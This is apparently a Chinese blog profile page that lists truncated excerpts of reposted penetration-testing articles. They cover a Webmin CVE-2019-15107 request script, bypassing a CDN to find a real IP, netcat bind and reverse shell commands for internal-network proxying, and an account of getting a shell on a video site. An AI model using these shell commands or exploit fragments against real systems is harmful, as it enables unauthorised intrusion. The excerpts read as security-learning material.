自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(6)
  • 收藏
  • 关注

转载 python操作burp的requests插件实现批量化获取flag(webmin漏洞CVE-2019-15107)

webmin漏洞CVE-2019-15107 漏洞原理:使用burpsuit的右键copy as requestsburp0_url = "https://192.168.184.128:10000/password_change.cgi"burp0_cookies = {"redirect": "1", "testing": "1", "sid": "x", "se...

2019-08-24 20:46:00 825

转载 绕过cdn查找真实IP

在渗透测试过程中,目标服务器可能只有一个域名。如果目标服务器不存在CDN,可以直接通过www.ip138.com获取目标的一些IP及域名信息。如果存在CDN如何绕过,获取到目标服务器的真实IP?1、目标服务器存在CDN  CDN即内容分发网络,主要解决因传输距离和不同运营商节点造成的网络速度性能底下的问题。说的简单点,就是一组在不同运营商之间的对接节点上的高速缓存服务器,吧用...

2019-07-21 20:09:00 129

转载 Flag

100个漏洞复现信息收集转载于:https://www.cnblogs.com/R1card0/p/10633244.html

2019-03-31 21:18:00 117

转载 内网渗透的边界场景分析+内网代理整理

先从nc开始理解正向代理和反向代理:1、正向连接受害者主机执行nc -e -t /bin/bash -lvp 7777攻击者执行nc -t 192.168.16.X 77772、反向连接受害者主机执行nc -t -e cmd.exe 192.168.16.104 7777攻击者主机执行nc -lvp...

2019-03-22 23:19:00 704

转载 内网反向代理的一些整理(深入理解反向代理)

这几天在搞BCTF,是一个简单的内网环境,放到国内,基本小厂的网络拓扑也就这个。环境详情攻击端192.168.16.103外部的防火墙(出口主机)192.168.16.118Web端172.16.10.2 对外映射80端口到192.168.16.118Sever端172.16.10.3内网里面就两台...

2019-03-14 17:56:00 266

转载 一个付费用户4000+的视频站getshell

只有一个目标域名 domaincom前期信息收集:该站点是一个视频app的推广网站子域名爆破一波:发现一个比较有意思的的视频主站,没有分析app的数据包,但是估计就是调用的这个主站的资源。后台尝试一下:admin直接跳转到了后台,卧槽太顺利了有验证码,瞬间想放弃,师父在旁边说,有验证码就放弃了啊尝试admin:admin登录成功(!!!!!!...

2019-03-08 16:58:00 97

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除